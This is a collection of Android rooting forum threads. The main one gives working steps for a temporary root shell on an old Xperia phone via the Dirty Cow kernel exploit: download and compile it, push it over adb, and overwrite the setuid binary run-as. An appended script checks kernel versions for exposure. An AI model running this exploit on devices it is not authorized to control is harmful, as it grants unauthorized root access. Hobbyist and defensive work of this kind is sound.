Backup TA/DRM partition with "Dirty Cow" exploit? - Sony Xperia X Questions & Answers

Recently, an exploit to the Linux kernel called "dirty cow" was released. If I understand correctly, it does not allow for temp root because SELinux blocks access to some system resources, even if the shell is running as root. However, would the root shell be privileged enough to grab a copy of the TA partition (also known as the DRM partition) before unlocking the bootloader?

Very good question! And for a similar train of thought, couldn't the root shell be used to get permanent root without unlocking the BL?

Saving TA would be very nice

I don't have (for the moment) Xperia X, but I've read something that I think you/we can try/modify/do some magic with.
Just here
It uses Linux and the Android NDK, but maybe, with some tinkering and skill, it can temp root the Xperia X (or others) in order to back up the TA key

edit: nevermind

Now it is possible to backup the TA image using the dirtycow exploit
http://forum.xda-developers.com/crossdevice-dev/sony/universal-dirtycow-based-ta-backup-t3514236

Related

Root access

Hello,
I only want to install some apps from the market (setcpu, market enabler and root explorer,...) that require root access.
So what do I have to do? Is it enough if I just unlock my bootloader with the tool on htcdev.com?
Which way of rooting my device would you recommend me?
I use an evo 3d gsm (eu version).
thx for the help
Honestly I go with the root posted here in xda, my friend rooted with the HTC method and has had some weird stuff going on (no roaming or 3G). I've had my phone rooted with the method given here on xda and haven't got any problems.
MettlerNikola said:
Hello,
I only want to install some apps from the market (setcpu, market enabler and root explorer,...) that require root access.
So what do I have to do? Is it enough if I just unlock my bootloader with the tool on htcdev.com?
Which way of rooting my device would you recommend me?
I use an evo 3d gsm (eu version).
thx for the help
The main limitation to modifying anything on our device is the internal memory write protection HTC has installed.
There is a temporary method, which will work on previous system software versions to get root access, a traditional out of bounds exploit, fre3vo.
This will have to be run after each boot to get root access as it does not unlock the internal memory write protection, hence the term temporary root.
In order to unlock the internal memory write protection, so our modifications to the system persist past reboot, we have to run one of two unlock methods, revolutionary or htc.
Personally, I ran revolutionary and will probably still continue to do so as it unlocks more of the internal memory more of the time.
If you're looking to follow the *official* route, you'll probably want to use the HTC method. This method is semi new and I haven't personally used it. I only speak from experience gained through others posting their experiences. If I leave something out, I'm sure somebody will correct me.
The official htc dev method should unlock the write protection at least while in the bootloader and fastboot mode where you can flash a custom recovery and/or custom kernel. Once you have a custom recovery loaded, you can boot into recovery mode, where the internal memory write protection on the /system partition is disabled and make changes to the system, i.e. install an su binary or Superuser.apk (has its own su binary) to provide root access to Android applications.
After you've installed either the su binary, or the Superuser.apk, my application called Root Check is free in the android market and the advanced mode will provide all the details either confirming a proper installation or highlighting the area with issues.
I'm sure there is a guide around here .. I probably should have linked to it rather than write out the process ... lol
Hope that helps and best of luck!
Assuming you have the 1.5 HBoot? If so I don't really know anything about that... I wouldn't use HTC's method.
If you have an HBoot before 1.5 just use unrevoked.
S-Off does not mean you have root BTW it just means you can flash stuff. Once you have S-Off you have to flash super user to get root access.

Question about rooting

Does rooting really mean exploiting a kernel vulnerability to gain root access?
If there are no vulnerabilities, no root access?
Why doesn't Android allow root access by default, like other Linux systems or Windows?
silvercats said:
Does rooting really mean exploiting a kernel vulnerability to gain root access?
If there are no vulnerabilities, no root access?
No, not really. Using a vulnerability is only needed when the manufacturer does not allow you to root your device, i.e. when it uses a locked bootloader that cannot be unlocked.
silvercats said:
Why doesn't Android allow root access by default, like other Linux systems or Windows?
Because when you buy a phone, the manufacturer guarantees not only the functionality of the hardware, but of the software as well. This is the difference compared to an ordinary computer. If you could modify the software in the device, the manufacturer would no longer be able to guarantee its function.
Another reason is DRM - for this to work safely (for the rights owner), the device must be tamper proof. This is why many manufacturers that allow unlocking erase any DRM information from the phone at the same time.

[Question] Root access without modifying system partitions?

I'm working on a home project, to back up Android partitions forensically for data recovery.
I already concluded that I need root access. So I have researched things that could achieve this goal.
Kingroot - Out of the running, bloatware etc..
SuperSu - Closed source ...
Magisk - needs to adjust the boot loader
Questions:
- Are there other ways to get forensic partition copies from Android phones?
- Are there other ways to recover deleted files from Android phones?

Any idea how to root an OPPO A77 CPH1715 phone?

Sorry if a similar thread has been made, but I cannot find any guide to rooting this damn thing that doesn't involve sketchy one-click-root apps. Any help would be greatly appreciated.
Follow-up question: I did some more digging around on Google and found this:
www(dot)getdroidpro(dot)com/oppo-a77-mediatek-root-via-magisk/
Is this legit?
Forget all the so-called One-click-Root apps: they are known to be spyware. If used and in fact working, then take note that they modify Android's /system partition, which can easily be detected.
In contrast to that Magisk uses a systemless strategy for rooting, meaning that your device's Android will be rooted without any alterations or changes being made to the /system partition. In fact, /system is not even mounted r/w by Magisk. This is accomplished by Android's boot image patching. The bad thing, IMHO, is that you have to install TWRP, too, in order to install Magisk.
Finally: Magisk is a hacker tool, in Google's point of view it's NOT legit.
jwoegerbauer said:
Forget all the so-called One-click-Root apps: they are known to be spyware. If used and in fact working, then take note that they modify Android's /system partition, which can easily be detected.
In contrast to that Magisk uses a systemless strategy for rooting, meaning that your device's Android will be rooted without any alterations or changes being made to the /system partition. In fact, /system is not even mounted r/w by Magisk. This is accomplished by Android's boot image patching. The bad thing, IMHO, is that you have to install TWRP, too, in order to install Magisk.
Finally: Magisk is a hacker tool, in Google's point of view it's NOT legit.
Hey thanks a lot, I'll take this to assume Magisk is a decent way to go about the rooting process.

Most transparent way to run root shell on Xperia Ray (ST18i), 4.0.4 ICS, 4.1.B.1.13

Dear everyone,
Since my Xperia Ray has grown too old to run some apps I need, I'm moving over to a Z3 compact. Instead of figuring out how to backup and move each app, I'd like to use "adb backup". This requires BackupRestoreConfirmation.apk, which Sony excluded from its stock ROM. I've extracted the corresponding .apk and .odex from a system image and would like to install it on the Ray (by copying it to /system/app).
For this I need a root shell. I'd like to know what's the best way to get a root prompt on the Xperia Ray.
My criteria would be as follows:
Runs on the ST18i stock ROM (4.1.b.1.13, Android 4.0.4, Kernel 2.6.32-9)
No need to unlock the bootloader or flash anything
No need for a Windows machine
Understandable, "transparent", not a precompiled binary/app that could do other things under the hood
There are many threads on rooting this device, but many are dated, so there may be better ways by now that are not specific to the ST18i. There are also several one-click tools which are not transparent at all (and often require Windows).
I already did my research and found the following:
zergRush: only applies to Android 2.1-2.3
[04/Jan][ROOTING/UNROOTING] DooMLoRD's Easy Rooting Toolkit [v4.0](zergRush Exploit)
forum.xda-developers.com
[Daily Update]Root / Unroot Sony Ericsson Xperia 2011 v1.5 without unlock bootloader
forum.xda-developers.com
Rooting xperia mini/mini pro+more devices without unlocking bootloader
forum.xda-developers.com
eroot: supposedly explained on eroot.me, but that web site is dead
{{NEW}} One Click Root [4.1.B.0.587/.431/ 4.0.2.A.0.62] All 2011 Xperias
forum.xda-developers.com
One Key ROOT For lt26i, lt26ii 2.55 Firmwares with locked bootloader
forum.xda-developers.com
iroot: intransparent, seems to install additional software
Download iRoot For PC v1.8.9.21144 (Latest Version) | Root My Device
rootmydevice.com
towelroot, kingroot, kingoroot: intransparent, sometimes considered malware
framaroot: not listed among supported devices
[Sticky] [Framaroot] Supported devices
forum.xda-developers.com
ln -s /data /data/local/tmp: very neat and understandable, but requires /data/local to be writeable and /data/local.prop to be missing, neither of which is given on my device
Full Disclosure: Re: debugfs exploit for a number of Android devices
seclists.org
adb restore remount timing issue: requires "adb backup" to work, which is not given on my device
Root MANY ANDROID! [Upd: 20.07.2014] - Updated: New Z2 Root by CubeandCube
forum.xda-developers.com
adb restore directory traversal: again requires "adb backup" to work, which is not given on my device
Full Disclosure: Android ICS "adb restore" directory traversal vulnerability
seclists.org
mempodipper / mempodroid: requires kernel 2.6.39 or above, which is not given on my device
GitHub - saurik/mempodroid
github.com
DirtyCow: I'd consider this transparent enough if I compile things myself, any idea whether this works?
GitHub - timwr/CVE-2016-5195: CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android
github.com
GitHub - j0nk0/GetRoot-Android-DirtyCow: Get temporary root by exploiting the dirtycow vulnerability.
github.com
Since there are one-click tools, there ought to be a way that works, but I'd prefer to know what exploit they'd use for this device and then do it myself. I hope some of you can recommend an exploit!
Thanks a lot and A Happy New Year!
Hm, seems the user base is smaller than I expected
For posterity, I can report that it's possible to get a temporary root shell using the Dirty Cow vulnerability. However, the proof of concept from https://github.com/timwr/CVE-2016-5195 does not work out of the box. It tries to overwrite /system/bin/run-as (a setuid root binary) with a new binary that spawns an interactive shell. This is a pretty large patch (trying to write about 62 kilobytes), and on my (slow) phone the exploit only managed to write small portions of it. I changed parts of the exploit to skip unneeded writes and not end too early, getting it to succeed: https://github.com/timwr/CVE-2016-5195/pull/99
Steps to reproduce (from a Linux terminal):
Download and extract the modified exploit from https://github.com/f0k/CVE-2016-5195/archive/more-efficient.zip:
Bash:
wget https://github.com/f0k/CVE-2016-5195/archive/more-efficient.zip
unzip -d /tmp more-efficient.zip
Download and extract the Android NDK from https://dl.google.com/android/repository/android-ndk-r14b-linux-x86_64.zip and put it on your path:
Bash:
wget https://dl.google.com/android/repository/android-ndk-r14b-linux-x86_64.zip
unzip -d /tmp android-ndk-r14b-linux-x86_64.zip
export PATH="$PATH:/tmp/android-ndk-r14b"
Attach the phone via USB, make sure USB debugging is enabled and adb can see the device (adb devices)
Compile the exploit:
Bash:
cd /tmp/CVE-2016-5195-more-efficient/
make build
It will query your device via adb for the correct architecture and SDK version.
Push it to the device and run it:
Bash:
adb push libs/*/dirtycow /data/local/tmp/dcow
adb push libs/*/run-as /data/local/tmp/run-as
adb shell
cd /data/local/tmp/
cat /system/bin/run-as > run-as-original
chmod 777 dcow
./dcow run-as /system/bin/run-as --no-pad
(Or just run make root, if you don't need to know what is going on.)
If you now run run-as on the device (adb shell run-as), it will spawn a root shell. There are no further obstacles on the Xperia Ray's stock ICS ROM, you can mount -o rw,remount /system and modify the system partition, or whatever floats your boat. At least if you do not remount the system partition as writeable, the exploit should be temporary, so rebooting should restore the original /system/bin/run-as. Otherwise you may want to restore it via cat /data/local/tmp/run-as-original > /system/bin/run-as from a root shell.
Hope this helps someone from the future working with similarly outdated phones! According to Wikipedia, any phone with a Linux kernel between 2.6.22 and 4.8.3 / 4.7.9 / 4.4.26 is affected by DirtyCow, but if your device has SELinux, overwriting a setuid binary will not be enough.
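The post above gives the affected kernel range as 2.6.22 up to the fixes in 4.8.3 / 4.7.9 / 4.4.26. As an added example, not from the post or from any of the linked repositories, here is a small POSIX sh check that reduces a kernel release string (such as "2.6.32.9-perf" or "3.4.0-g1a2b3c", as `uname -r` prints it on a phone) to a verdict against exactly those boundaries. The function names and the three result labels are my own; the assumption is that a vendor may have backported the fix to an older stable branch without bumping the version, so "possibly_affected" is a prompt to inspect the device, not a confirmed finding.

```sh
#!/bin/sh
# Heuristic CVE-2016-5195 (Dirty Cow) exposure check from a kernel release string.
# Added example, not code from the post or the linked repositories.
# Affected range as stated in the post: 2.6.22 up to the fixes in 4.8.3 / 4.7.9 / 4.4.26.
# Assumption: a vendor may have backported the fix without changing the version
# string, so "possibly_affected" means "inspect further", not "confirmed vulnerable".

# Reduce a release string such as "2.6.32.9-perf+" or "3.4.0-g1a2b3c" to
# "major minor patch" (for 2.6.x kernels the third field is the 2.6 sublevel).
kver_fields() {
    v=${1%%-*}   # drop build suffixes like "-perf" or "-g1a2b3c"
    v=${v%%+*}   # drop a trailing "+"
    IFS=. read -r maj min pat _rest <<EOF
$v
EOF
    echo "${maj:-0} ${min:-0} ${pat:-0}"
}

# Print one of: not_affected, fixed, possibly_affected.
dirtycow_status() {
    set -- $(kver_fields "$1")
    maj=$1 min=$2 pat=$3
    n=$((maj * 1000000 + min * 1000 + pat))
    # Below 2.6.22 the vulnerable code path is not present.
    if [ "$n" -lt 2006022 ]; then
        echo not_affected; return
    fi
    # 4.9 and later were released with the fix already in.
    if [ "$maj" -gt 4 ] || { [ "$maj" -eq 4 ] && [ "$min" -ge 9 ]; }; then
        echo not_affected; return
    fi
    # Stable branches named in the post, with the first fixed patch level.
    case "$maj.$min" in
        4.8) limit=3 ;;
        4.7) limit=9 ;;
        4.4) limit=26 ;;
        *)   echo possibly_affected; return ;;
    esac
    if [ "$pat" -ge "$limit" ]; then
        echo fixed
    else
        echo possibly_affected
    fi
}

# Stand-alone use: check the running kernel (on a phone, run it inside adb shell).
rel=$(uname -r)
printf '%s -> %s\n' "$rel" "$(dirtycow_status "$rel")"
```

For the Xperia Ray's 2.6.32 kernel mentioned earlier in the thread this prints possibly_affected, which matches the outcome reported above; a 4.4.26 or 4.9 kernel comes back as fixed or not_affected respectively. As a defender, a verdict of possibly_affected is the cue to check whether /system/bin/run-as (or any other setuid binary) still matches a known-good copy.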
